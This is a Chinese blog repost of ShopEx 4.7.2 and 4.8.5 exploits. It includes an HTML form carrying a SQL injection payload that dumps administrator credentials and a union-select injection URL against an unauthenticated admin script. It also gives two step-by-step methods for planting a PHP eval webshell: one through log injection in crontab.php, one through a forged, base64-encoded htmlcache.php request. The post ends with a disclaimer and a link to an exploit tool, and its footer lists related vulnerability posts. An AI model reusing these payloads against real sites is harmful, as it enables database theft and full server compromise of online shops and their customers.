shopex 4.8.5.45144注入和远程shell写入漏洞

最新推荐文章于 2021-03-24 23:03:32 发布
最新推荐文章于 2021-03-24 23:03:32 发布
阅读量2.6k 收藏 1
点赞数
文章标签: shell url action 加密 session function
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6301545
版权

 

利用代码exp:

exploit.htm
-----
<form method="post" action="http://www.hackqing.cn/index.php" enctype="multipart/form-data">
<p>
<input type="hidden" name="spgdif" value="spgdif" />
<input type="hidden" name="session" value="session" />

<input name="query" type="password" value="a:1:{s:6:"fields";a:1:{s:6:"method";a:1:{s:6:"method";s:55:"CONCAT( username, 0x3a, userpass ) FROM sdb_operators #";}}}" size=10 />
</p>
<p>
    <input type="hidden" name="sign" value="9f36d67fa0ed218097491a5b469cb9af" />
    <input type="submit" name="Submit" value=' shopex 4.8.5.45144 
SQL Injection 
Vulnerability
O(°…_°…)O…‰¡À' style="width:150px;height:100px" />
    </p>
<p>shopex 4.8.5 SQL Injection Vulnerability 0day ”2010.06.12</p>
<p>By:qing</p>
<p>QQ:33089632</p>
</form>

二:shopex 4.8.5.45144 /core/include_v5/crontab.php 远程shell写入漏洞

/core/include_v5/crontab.php (zend加密后的,我只发布解密后的代码)

01 public function run( )
02                 {
03                                 $this->logFile = HOME_DIR."/logs/access.log.php";
04                                 $this->now = time( );
05                                 $this->viewStat( );
06                                 $messenger =& $this->loadModel( "system/messenger" );
07                                 $messenger->runQueue( );
08                 }
09 
10                 public function viewStat( )
11                 {
12                                 if ( !file_exists( $this->logFile ) )
13                                 {
14                                                 file_put_contents( $this->logFile, "#<?php exit()?>/n" );   //囧之处!
15                                 }
16                                 if ( isset( $_GET['action'] ) )
17                                 {
18                                                 error_log( $this->now."/t".$_GET['action']."/t".$_GET['p']."/n", 3, $this->logFile );//没有任何过滤,

利用:

 

直接提交:http://127.0.0.1/?cron=1&action=1&p=1<?php%20eval($_POST[cmd])?>

一句话在:http://127.0.0.1/home/logs/access.log.php

 

ShopEx 4.7.2 0day

作者:无名

我是无名,这次写一个shopex4.7.2漏洞,

已经通知了官方,今天就发出来,

首先syssite/shopadmin/order_service.php后台这个文件没有验证用户身份,

重要的是$v_id参数没有过滤

syssite/shopadmin/order_service.php?m_id=1&key=986078fbe1474d61464d08535f1002a8&&v_id=1+and+1=2+union+select+concat(username,0x20,userpass),2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+sdb_mall_offer_operater%23

直接获取管理员账号密码md5自己解,字段数不对用order by 猜,

有的站只能显示出来前14位,就用left(password,14) mid(password,15,4) right(password,14) 合起来就是完整的32位密码了

如果表名改了,mysql 5.0以上版本自己爆,相关内容不再叙述

登陆后台,接下来讲shell获取部分,(普通管理员一样利用)

分析根目录下htmlcache.php

分析代码的朋友注意了,

$url = base64_decode( $_GET['url'] );
$filename = base64_decode( $_GET['filename'] );
$signcode = $_GET['signcode'];
$verifycode = md5( $url.$filename."1e236443e5a30b09910e0d48c994b8e6" );
if ( $_cvar['seoCacheTime'] == "0" )
{
exit( );

}

变量 url  filename 提交的时候用base64 加密,

下面几句

if ( $_cvar['seoCacheTime'] == "0" )
{
exit( );
}
if ( substr( $filename, 0, 3 ) == "../" )
{
exit( );
}
if ( $verifycode != $signcode )
{
exit( );
}

$filename 不能有 ../

$verifycode 要等于$signcode

$_cvar['seoCacheTime'] 在syssite/home/shop/1/shop.cache.php有定义,默认是0

前面几个很容易就绕过去了,$_cvar['seoCacheTime'] 我在后台里一直没有找到在哪里设置,

分析代码发现,进入后台,直接在url后面输入syssite/shopadmin/admin_seo_act.php?act=savecachetime&seocachetime=60

设置seocachetime为60

好了,条件满足,开始获取shell

base64分别加密
http://你的url/test.txt 为$url变量,()
123.php         为$filename变量
$signcode是url+filename+1e236443e5a30b09910e0d48c994b8e6 的32位md5值

其实url完全不用获取test.txt内容的,有时候会获取不成功,
url直接写成http://www.baidu.com/<?php eval($_POST[cmd]);?> base64加密就行了

加密结果

url   aHR0cDovL3d3dy5iYWlkdS5jb20vPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=
filename MTIzLnBocA==
signcode 186350a50934cb17b9bc47f5e067adbe

最后提交

htmlcache.php?url=aHR0cDovL3d3dy5iYWlkdS5jb20vPD9waHAgZXZhbCgkX1BPU1RbY21kXSk7Pz4=&filename=MTIzLnBocA==&signcode=186350a50934cb17b9bc47f5e067adbe

直接在根目录生成123.php内容为一句话后门,密码cmd

喜欢分析代码的朋友如果有什么不明白的地方,或者有什么错误的地方,欢迎指正

联系团队
SD_无名     QQ 57112848
SD_′&廢.   QQ 5081558

这里只是技术讨论,任何利用本文章做破坏的,本人概不负责

最后附上一个半成品的利用工具

 

下载地址:shopex472_exp.rar

7禧
关注
shopex PHP Notice,SHOPEX 4.8.5 最新注入漏洞后台拿SHELL
weixin_32734143的博客
03-17 482
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL漏洞文件:漏洞核心函数 \core\model_v5\trading\mdl.goods.php漏洞代码:public function getProducts( $gid, $pid = 0 ){$sqlWhere = "";if ( 0 < $pid ){$sqlWhere = " AND A.product_id = ".$pid;...
阿里云ShopEx 4.90 SQL注入漏洞修复
06-14
安装步骤如下: 1、解压补丁包,将全部文件以二进制的形式上传至网站根目录; 2、输入网站,执行安装过程; 你可能会遇到的问题: 1、如何使用FTP工具二进制上传; 2、与中心有关的应用无法使用,如支付方式、开店向导. 请确认你的网店所在空间可以访问shopex服务器,会自动生成证书。如果不能自动生成证书,请先设置服务器,正常后再更新补丁。 3、更新补丁后,某些功能不能使用. 可能的原因是网站中有二次开发的内容,请先停止二次开发的功能,功能一般会正常。 注意:老版本升级上来的店铺,需检查并开通服务器 curl组件和 Mcrypt加密
shopex4.8.5 php5.6,shopex v4.8.5 漏洞
weixin_39698217的博客
03-21 715
shopex v4.8.5 漏洞本人声明:只做技术研究,请勿破坏….谢谢.漏洞原因:直接看代码:public function tryLogin( $aValue, $issuper = false ){if ( $aValue['passwd'] == “+_-_-_+” ){$aValue['passwd'] = “”;}$sql = “SELECT * FROM sdb_operators ...
ShopEx漏洞
weixin_30615767的博客
06-25 331
ShopEx 国内市场占有率最高的网店系统.ShopEx是网络购物软件与技术服务全面提供商,ShopEx做为国内购物软件的开拓者和实践者,提供了从购物软件(包括网上商店、网上商城、网上商店多店系统)到相关配套服务(网店推广、模板设计、流量监测、商业智能分析、网上支付、网店互联、购物系统定制开发等)以及深层次的电子商务技术服务。************************************...
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL
cnbird's blog
08-07 5601
SHOPEX 4.8.5 注入漏洞以及后台拿SHELL 有人贴出来一个,我就转出来下吧,给大家看看。 漏洞文件: 漏洞核心函数 \core\model_v5\trading\mdl.goods.php 漏洞代码: ?View Code PHP \core\shop\controller\ctl.product.php 文件调用 ?V
shopex前台getshell漏洞
收集盒 Book box
01-03 1876
第一步需要想办法得到目标站点的绝对路径 如: http://seelx.com/install/svinfo.php?phpinfo=true http://seelx.com/core/api/shop_api.php http://seelx.com/core/api/site/2.0/api_b2b_2_0_cat.php http://seelx.com/co
shopex485( ShopEx4.8.5.55324、326、328)去版权插件
06-27
ShopEx4.8.5是该软件的一个版本,其中包含了多项功能和服务,旨在帮助商家更好地管理他们的在线业务。在这个特定的压缩包文件中,我们主要关注的是"去版权插件"。 去版权插件通常是指在不违反法律的前提下,修改或...
shopex-single-4.8.5.45144.rar_build66v_shopex_single_网店管理
09-24
ShopEx Single 4.8.5.45144是一款专为个人创业者设计的网店程序,它以其易用性和高效管理能力,成为了个人开设网站的理想选择。这款软件的出现,极大地简化了网店运营过程中的复杂环节,让店主能够更专注于商品销售...
ShopEx网上商店系统 4.8.5.82977
11-28
ShopEx网上商店系统4.8.5.82977是一款专为电子商务设计的全面、易用且可扩展的在线购物平台。该系统具备完善的功能集,为企业和个人提供了搭建网店的一站式解决方案,无任何使用时间或功能的限制,确保用户能够自由...
shopex 4.8.5.55328 最稳定珍藏版
05-19
ShopEx是中国知名的电子商务软件提供商,推出的4.8.5.55328版本被誉为最稳定珍藏版,这表明该版本在经过一系列优化和修复后,具备了极高的稳定性和可靠性,对于商家来说,这样的系统是运营线上店铺的理想选择。...
最新商派shopex 破解版4.8.5已验证
12-14
最新商派shopex 破解版,含前后台和测试数据,版本是4.8.5已验证,直接解压到根目录
shopex服务器安装包4.8.5-55328
06-27
shopex服务器安装包4.8.5-55328本地安装包
shopex4.8.5.78660及去版权
05-08
"shopex-single-4.8.5.78660.zip"则可能是Shopex 4.8.5.78660的单一安装包,用户可以使用这个文件来安装或更新他们的Shopex系统。这个版本可能已经预处理过,去除了部分版权信息,或者提供了一个便捷的方式让用户...
shopex admincore.php,Shopex后台登录页面注入漏洞附利用POC
weixin_39653622的博客
03-10 375
对登录时传递的某参数未做过滤,导致注入的产生最近做二次开发的时候看到了登录的流程发现在文件\shopex\core\admin\controller\ctl.passport.php处理了验证码,管理帐号和密码,但是在最底下发现一个sess_idfunction certi_validate(){$cert = $this->system->loadModel('service/cer...
惊爆漏洞ShopEX4.8.5隐患漏洞,最终解决方法ShopEX4.8.5安装完成后打开显示:Access denied by install.lock...
weixin_34183910的博客
08-04 247
标签:安全 漏洞 电子商务 ShopEX Access denied by install.lock 添加标签>> 原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://jimmyli.jimmyli.jimmyli.blog.51cto.com/3190309/631436 惊爆漏洞ShopE...
shopex前台普通用户getshell最新漏洞
收集盒 Book box
11-08 1025
第一个:想办法找到目标网站的绝对路径 http://www.baidu.com/install/svinfo.php?phpinfo=true http://www.baidu.com/core/api/shop_api.php http://www.baidu.com/core/api/site/2.0/api_b2b_2_0_cat.php http://www.bai
shopex最新版前台一处想不到的SQL注入漏洞
weixin_30242907的博客
08-03 1007
shopex代码核心的地方都做了加密处理,找漏洞就需要一点想象空间了,比如这个SQL注入… 存在于用户注册(想不到的位置吧?) /core/shop/controller/ctl.passport.php 267行 if( !$info = $account->create($_POST,$message) ) { … 2.看到1,想到有没有可能$account-&gt...
PHP_crontab 漏洞,shopex 4.8.5.45144 \core\include_v5\crontab.php 远程shell写入漏洞
weixin_39741101的博客
03-24 96
ShopEx网上商店平台软件系统又称网店管理系统、网店程序、网上购物系统、在线购物系统。\core\include_v5\crontab.php (zend加密后的,我只发布解密后的代码)01 public function run( )02 {03 $this->logFile = HOME_DI...
pymssql中执行sql sever为什么会乱码_禅道免登陆SQL注入漏洞复现
weixin_39645249的博客
12-12 163
一、漏洞简介该漏洞影响版本为禅道8.2--9.2.1,禅道项目管理软件集产品管理、项目管理、质量管理、文档管理、组织管理和事务管理于一体,是一款功能完备的项目管理软件,完美地覆盖了项目管理的核心流程。漏洞出现在系统orm框架中,在拼接order by的语句过程的时候,未对limit部分过滤并直接拼接,导致攻击者构造执行SQL语句。在mysql权限配置不当的情况下,攻击者可利用该漏洞获取w...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值